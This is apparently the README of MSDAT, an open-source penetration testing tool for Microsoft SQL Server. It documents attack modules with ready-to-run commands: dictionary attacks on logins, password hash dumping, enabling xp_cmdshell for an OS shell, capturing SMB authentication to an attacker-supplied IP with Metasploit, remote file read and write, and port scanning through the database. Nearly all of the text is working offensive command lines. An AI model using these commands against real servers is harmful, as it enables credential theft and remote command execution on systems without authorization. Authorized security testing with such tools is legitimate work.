MSDAT (Microsoft SQL Database Attacking Tool) is an open source penetration testing tool that tests the security of Microsoft SQL Databases remotely.
Usage examples of MSDAT:
- You have a Microsoft database listening remotely and you want to find valid credentials in order to connect to the database
- You have a valid Microsoft SQL account on a database and you want to escalate your privileges
- You have a valid Microsoft SQL account and you want to execute commands on the operating system hosting this DB (xp_cmdshell)
Tested on Microsof SQL database 2005, 2008 and 2012.
Changelog
- Version 1.0 (2017/02/15) :
- first version realeased
Features
Thanks to MSDAT (Microsoft SQL Database Attacking Tool), you can:
- get technical information (ex: database version) of a MSSQL database without to be authenticated
- search MSSQL accounts with a dictionnary attack
- test each login as password (authentication required)
- get a windows shell on the database server with
- xp_cmdshell
- download files remotely with:
- OLE Automation
- bulkinsert
- openrowset
- upload files on the server with:
- OLE Automation
- openrowset
- capture a SMB authentication thanks to:
- bulkinsert
- openrowset
- xp_dirtree
- xp_fileexist
- xp-getfiledetails
- steal MSSQL hashed password, on an any MSSQL version
- scan ports through the database:
- openrowset
- execute SQL requests on a remote MSSQL server trough the database (target) with:
- bulkinsert
- openrowset
- list files/directories with:
- xp_subdirs
- xp_dirtree
- list drives/medias with:
- xp_fixeddrives
- xp_availablemedia
- create folder with:
- xp_create_subdir
Installation
Some dependancies must be installed in order to run MSDAT.
In ubuntu:
sudo apt-get install freetds-dev sudo pip install cython colorlog termcolor pymssql argparse
sudo pip install argcomplete && sudo activate-global-python-argcomplete[global]
# TDS protocol version
tds version = 8.0
use ntlmv2 = yesExamples
Modules
- You can list all modules:
./msdat.py -h- When you have chosen a module (example: all), you can use it and you can list all features and options of the module:
./msdat.py all -hall module
The all module allows you to run all modules (depends on options that you have purchased).
python msdat.py all -s $SERVER- to use your own account file for the dictionnary attack
- try multiple passwords for a user without ask you
- to define your own timeout value
./msdat.py all -s $SERVER -p $PORT --accounts-file accounts.txt --login-timeout 10 --force-retrymssqlinfo module
To get technical information about a remote MSSQL server without to be authenticated:
./msdat.py mssqlinfo -s $SERVER -p $PORT --get-max-infopasswordguesser module
This module allows you to search valid credentials :
./msdat.py passwordguesser -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --force-retry --searchYou can specify your own account file with the --accounts-file option:
./msdat.py passwordguesser -s $SERVER -p $PORT --search --accounts-file accounts.txt --force-retrypasswordstealer module
To dump hashed passwords :
./msdat.py passwordstealer -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --dump --save-to-file test.txtxpcmdshell module
To execute system commands thanks to xp_cmdshell (https://msdn.microsoft.com/en-us/library/ms190693.aspx):
./msdat.py xpcmdshell -s $SERVER -p $PORT -U $USER -P $PASSWORD --shellIf xp_cmdshell is not enabled, the --enable-xpcmdshell can be used in this module to activate it:
./msdat.py xpcmdshell -s $SERVER -p $PORT -U $USER -P $PASSWORD --enable-xpcmdshell --disable-xpcmdshell --disable-xpcmdshell --shellThe --disable-xpcmdshell option disables xp_cmdshell if this one is enabled.
smbauthcapture module
Thanks to this module, you can capture a SMB authentication:
./msdat.py smbauthcapture -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --capture $MY_IP_ADDRESS --share-name SHAREmsf > use auxiliary/server/capture/smb
msf auxiliary(smb) > exploitIf you want to choose the SMB authentication procedure to capture the authentication:
./msdat.py smbauthcapture -s $SERVER -p $PORT -U $USER -P $PASSWORD --xp-dirtree-capture 127.0.0.1
./msdat.py smbauthcapture -s $SERVER -p $PORT -U $USER -P $PASSWORD --xp-fileexist-capture 127.0.0.1
./msdat.py smbauthcapture -s $SERVER -p $PORT -U $USER -P $PASSWORD --xp-getfiledetails-capture 127.0.0.1oleautomation module
This module can be used to read/write file in the database server.
The following command read the file temp.txt stored in the database server:
./msdat.py oleautomation -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --read-file 'C:\Users\Administrator\Desktop\temp.txt'./msdat.py oleautomation -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --write-file 'C:\Users\Administrator\Desktop\temp.txt' 'a\nb\nc\nd\ne\nf'./msdat.py oleautomation -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --get-file 'C:\Users\Administrator\Desktop\temp.txt' temp.txt./msdat.py oleautomation -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --put-file temp.txt 'C:\Users\Administrator\Desktop\temp.txtbulkopen module
The module bulkopen can be used :
- to read/download files stored on a database server
- to scan ports through the database server
- to execute SQL requests on a remote MSSQL server through the database
./msdat.py bulkopen -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --read-file 'C:\Users\Administrator\Desktop\temp.txt'"- bulkinsert (https://msdn.microsoft.com/en-us/library/ms188365.aspx) or
- openrowset(https://msdn.microsoft.com/en-us/library/ms190312.aspx)):
./msdat.py bulkopen -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --read-file 'C:\Users\Administrator\Desktop\temp.txt' --method openrowset
This module can be used to scan ports (1433 and 1434 of 127.0.0.1) through the database server:
```bash
./msdat.py bulkopen -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --scan-ports 127.0.0.1 1433,1434 -v./msdat.py bulkopen -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --scan-ports 127.0.0.1 1433-1438./msdat.py bulkopen -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --request-rdb $SERVER2 $PORT $DATABASE $USER $PASSWORD 'select @@ServerName'xpdirectory module
The module xpdirectory can be used:
- to list:
- files
- directories
- drives
- to check if a file exists
- to create a directory
./msdat.py xpdirectory -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --list-files 'C:\'./msdat.py xpdirectory -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --list-dir 'C:\'./msdat.py xpdirectory -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --list-fixed-drives --list-available-media./msdat.py xpdirectory -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --file-exists 'C:\' --file-exists 'file.txt'./msdat.py xpdirectory --s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --create-dir 'C:\temp'search module
The module search can be used to search a pattern in column names of tables and views. Usefull to search the pattern %password% in column names for example.
To get column names which contains password patterns (ex: passwd, password, motdepasse, clave):
./msdat.py search -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --pwd-column-names --show-empty-columnsTo search a specific pattern in column names of views and tables:
./msdat.py search -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --pwd-column-names --show-empty-columns